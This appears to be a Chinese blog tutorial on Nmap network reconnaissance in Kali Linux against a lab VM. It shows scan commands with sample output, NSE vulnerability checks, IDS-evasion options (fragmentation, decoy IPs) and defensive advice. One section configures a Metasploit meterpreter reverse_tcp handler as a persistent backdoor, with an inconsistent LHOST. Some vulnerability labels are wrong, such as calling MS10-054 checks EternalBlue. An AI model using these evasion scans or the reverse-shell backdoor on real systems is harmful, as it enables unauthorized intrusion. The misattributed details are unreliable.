Kali Linux实战教程:从0到1掌握网络侦察核心技能
- 2026-03-07 02:45:03
👉 仔细阅读,解锁渗透测试的"眼睛"!
Nmap作为网络渗透测试的核心侦察工具,在Kali Linux中扮演着"数字雷达"的角色,能够精准绘制目标网络的数字地形图。下面我将以 Rapid7 开发的漏洞虚拟机镜像(预装了 Apache、MySQL、FTP 等 20+ 种存在已知漏洞的服务),说说其原理、用法及防御策略。
一、Nmap核心原理与功能
Nmap(Network Mapper)是一款开源网络扫描与安全审计工具,自1997年问世以来已成为渗透测试行业的事实标准。其核心价值在于:
主机发现:快速识别网络中存活的设备;
端口扫描:探测目标主机开放的端口及服务;
服务识别:确定端口运行的具体服务及版本;
操作系统检测:通过TCP/IP协议栈特征推断系统类型;
NSE脚本引擎:扩展功能实现漏洞检测、暴力破解等高级操作。
Nmap的工作原理是向目标发送特制数据包,通过分析响应特征获取信息。例如SYN扫描仅发送SYN包,收到SYN-ACK即判定端口开放,避免完整三次握手被记录。
二、Kali Linux中Nmap基础使用
Kali Linux默认预装Nmap,无需额外安装。基本命令格式为:
nmap [扫描类型] [选项] {目标地址}2.1 主机发现技术
Ping扫描(检测存活主机):
nmap -sn 192.168.1.0/24该命令快速扫描整个网段,仅检测主机是否在线,不进行端口扫描。
2.2 端口扫描技术
2.2.1 SYN半开放扫描(最常用,隐蔽性高):
nmap -sS 192.168.1.160仅发送SYN包,收到SYN-ACK即判定端口开放,不建立完整连接,降低被检测概率。其结果示例如下:
┌──(kali㉿kali)-[~]└─$ nmap -sS 192.168.1.160Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-02 04:20 ESTNmap scan report for DESKTOP-A75VL7D (192.168.1.160)Host is up (0.0035s latency).Not shown: 595 filtered tcp ports (no-response), 389 closed tcp ports (reset)PORT STATE SERVICE21/tcp open ftp25/tcp open smtp80/tcp open http110/tcp open pop3135/tcp open msrpc139/tcp open netbios-ssn143/tcp open imap445/tcp open microsoft-ds903/tcp open iss-console-mgr1433/tcp open ms-sql-s3306/tcp open mysql8000/tcp open http-alt8080/tcp open http-proxy8443/tcp open https-alt8888/tcp open sun-answerbook9200/tcp open wap-wspNmap done: 1 IP address (1 host up) scanned in 240.72 seconds
2.2.2 TCP全连接扫描(稳定但易被记录):
nmap -sT 192.168.1.160建立完整TCP连接,适合入门使用,但会在目标系统日志中留下记录。
┌──(kali㉿kali)-[~]└─$ nmap -sT 192.168.1.160Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-02 04:27 ESTNmap scan report for DESKTOP-A75VL7D (192.168.1.160)Host is up (0.00086s latency).Not shown: 995 filtered tcp ports (no-response)PORT STATE SERVICE21/tcp open ftp80/tcp open http110/tcp open pop38080/tcp open http-proxy9200/tcp open wap-wspNmap done: 1 IP address (1 host up) scanned in 21.96 seconds
2.2.3 UDP扫描(检测UDP服务):
nmap -sU 192.168.1.160用于探测DNS、SNMP、DHCP等UDP服务,结果显示为 open|filtered(开放或过滤)。这是由 UDP 协议的特性 和 Nmap 的判定逻辑 决定的。如果你想准确信息,可以使命以下命令只扫最可能有服务的端口(如 DNS 53, SNMP 161, NetBIOS 137/138):
nmap -sU -p 53,137,138,161,1900 192.168.1.160其结果示例如下:
┌──(kali㉿kali)-[~]└─$ nmap -sU -p 53,137,138,161,1900 192.168.1.160Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-02 04:34 ESTNmap scan report for DESKTOP-A75VL7D (192.168.1.160)Host is up (0.00066s latency).PORT STATE SERVICE53/udp open|filtered domain137/udp open|filtered netbios-ns138/udp open|filtered netbios-dgm161/udp open|filtered snmp1900/udp open|filtered upnpNmap done: 1 IP address (1 host up) scanned in 1.47 seconds
2.3 服务与系统识别
2.3.1 服务版本检测(关键漏洞入口):
nmap -sV 192.168.1.160其检测结果示例如下:
┌──(kali㉿kali)-[~]└─$ nmap -sV 192.168.1.160Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-02 04:41 ESTNmap scan report for DESKTOP-A75VL7D (192.168.1.160)Host is up (2.1s latency).Not shown: 983 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open tcpwrapped25/tcp open tcpwrapped80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)110/tcp open tcpwrapped135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn143/tcp open tcpwrapped445/tcp open microsoft-ds?514/tcp filtered shell903/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.62203306/tcp open mysql MySQL (unauthorized)8000/tcp open http-alt8080/tcp open http Apache httpd 2.4.54 ((Win64) PHP/8.2.0 mod_fcgid/2.3.10-dev)8443/tcp open ssl/https-alt8888/tcp open http nginx9200/tcp open wap-wsp?2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :.........
识别服务具体版本(如Apache 2.4.54),为后续漏洞利用提供精准目标。
2.3.2 操作系统检测(定制攻击策略):
nmap -O 192.168.1.160通过TCP/IP协议栈特征推断目标系统类型。
三、高级扫描技术与实战示例
3.1 全面扫描(渗透测试标准流程)
nmap -p- -sV -sC -O -T4 192.168.1.160 -oA full_scan-p-:扫描所有65535个端口
-sV:服务版本探测
-sC:运行默认NSE脚本
-O:操作系统检测
-T4:平衡速度与准确性的扫描时序
-oA:将结果输出为多种格式
┌──(kali㉿kali)-[~]└─$ nmap -p- -sV -sC -O -T4 192.168.1.160 -oA full_scanStarting Nmap 7.95 ( https://nmap.org ) at 2026-03-02 04:55 ESTsendto in send_ip_packet_sd: sendto(8, packet, 44, 0, 192.168.1.160, 16) => Network is unreachableOffending packet: TCP 192.168.137.54:52440 > 192.168.1.160:60152 S ttl=41 id=33688 iplen=44 seq=3992438514 win=1024 <mss 1460>sendto in send_ip_packet_sd: sendto(8, packet, 44, 0, 192.168.1.160, 16) => Network is unreachableOffending packet: TCP 192.168.137.54:52543 > 192.168.1.160:43470 S ttl=49 id=23481 iplen=44 seq=3986212509 win=1024 <mss 1460>sendto in send_ip_packet_sd: sendto(8, packet, 44, 0, 192.168.1.160, 16) => Network is unreachableOffending packet: TCP 192.168.137.54:52436 > 192.168.1.160:36359 S ttl=59 id=49346 iplen=44 seq=3992176374 win=1024 <mss 1460>
该命令全面探测目标,是渗透测试信息收集阶段的核心操作。
3.2 NSE脚本实战(Nmap灵魂功能)
Nmap的真正威力在于NSE脚本引擎,内置超多个脚本,具体请登录 Github查看https://github.com/nmap/nmap/tree/master/scripts 。可实现更多高级功能。
3.2.1 漏洞检测:
nmap --script=vuln 192.168.1.160自动检测已知CVE漏洞,如心脏出血、永恒之蓝、Web服务漏洞等。最后一段显示如下:
Host script results:|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR|_smb-vuln-ms10-054: falseNmap done: 1 IP address (1 host up) scanned in 531.44 seconds
false = 无漏洞(安全)true = 有漏洞(危险)Could not negotiate = 无法检测(不安全,需排查)
结果显示当前主机状态:安全(MS10-054 已修复)
3.2.2 Web服务深度扫描:
nmap --script=http-enum,http-title,http-robots.txt -p80,443 192.168.1.160枚举Web目录、获取页面标题、检查robots.txt,快速发现Web应用弱点。
3.2.3 SMB漏洞检测(内网渗透关键):
nmap -p445 --script=smb-vuln-ms10-061,smb-vuln-ms10-054 --script-args smb1.min=2 192.168.1.160检测永恒之蓝漏洞,结果示例如下。
Host script results:|_smb-vuln-ms10-054: false|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
3.2.4 数据库弱口令检测:
nmap --script=mysql-empty-password -p3306 192.168.1.160检查MySQL是否存在空密码账户,常见入侵入口。如有,则显示如下:
PORT STATE SERVICE3306/tcp open mysql| mysql-empty-password:|_ root account has empty passwordMAC Address: 00:0C:29:FA:DD:2A (VMware)
四、防火墙规避技术
4.1 数据包分片(绕过简单防火墙):
nmap -f 192.168.1.160将数据包分段发送,增加防火墙检测难度。
4.2 随机延迟扫描(降低检测概率):
nmap -sS --scan-delay 100ms --max-retries 1 192.168.1.160控制扫描速率,避免触发IDS阈值。
4.3 诱饵IP混淆(隐藏真实来源):
nmap -D RND:5 192.168.1.160生成5个随机诱饵IP,混淆扫描源地址。
五、真实渗透测试流程示例
5.1 资产发现阶段:
nmap -sn 192.168.1.0/24 -oN alive.txt识别网段内存活主机。
5.2 重点目标深度扫描:
nmap -sS -sV -p- 192.168.1.160 -oN scan.txt发现关键服务:SSH 7.4、Apache 2.4.6、MySQL 5.7。
5.3 漏洞验证阶段:
nmap --script=vuln 192.168.1.160 -oN vuln.txt检测到弱口令、已知CVE漏洞和信息泄露。
5.4 利用与权限维持:
msf6 > use exploit/multi/handlermsf6 > set PAYLOAD linux/x86/meterpreter/reverse_tcpmsf6 > set LHOST 192.168.1.160msf6 > set LPORT 3306msf6 > run
通过Metasploit 建立持久化后门,实现权限维持。
五、安全防范措施与最佳实践
5.1 防火墙配置:
限制非必要端口的外部访问
设置速率限制防止快速扫描
配置IP黑名单自动封禁扫描源
5.2 IDS/IPS规则优化:
检测SYN扫描特征(大量SYN包无ACK响应)
识别UDP扫描模式(ICMP端口不可达响应)
设置阈值告警(如5秒内超过50个端口探测)
5.3 系统加固措施:
禁用ICMP响应(减少主机发现成功率)
隐藏服务版本信息(修改Apache、SSH等默认Banner)
定期更新系统修补已知漏洞
六、持续学习路径:
官方文档:nmap.org提供最权威信息
靶场练习:使用Metasploitable、Hack The Box等合法环境
社区贡献:参与NSE脚本开发,提升实战能力
Nmap作为网络空间的"望远镜",其价值不仅在于发现漏洞,更在于帮助安全团队全面了解自身攻击面。掌握Nmap的正确使用方法,是成为一名专业白帽子的必经之路。记住:工具无善恶,关键在于使用者的意图与授权。
随机文章
-
10个月宝宝每天需要喝多少奶粉?
- Python从入门到精通day43
- linux内存碎片化问题讨论
- Python装饰器4大实战写法,高效掌握!
- 【重磅】生信入门培训报名-Linux/R/Python-生信软件安装-转录组-群体-基因组T2T-表观组学-单细胞-空间组-比较基因组
- 学Python《Python编程:从入门到实践》第三
- Python 入门必学:6 大经典算法详解
- Linux 一线必备:高能 Shell 脚本,让工作效能飙升
- 记录,基于Rocky Linux 10 操作系统使用Docker部署 gitlab-ce
- 美国政府、Linux推出OCUDU:要6G开源!
- OpenClaw 3 个月走完 Linux 30 年的社区认可之路:开发者用星标,投票给能干活的 AI
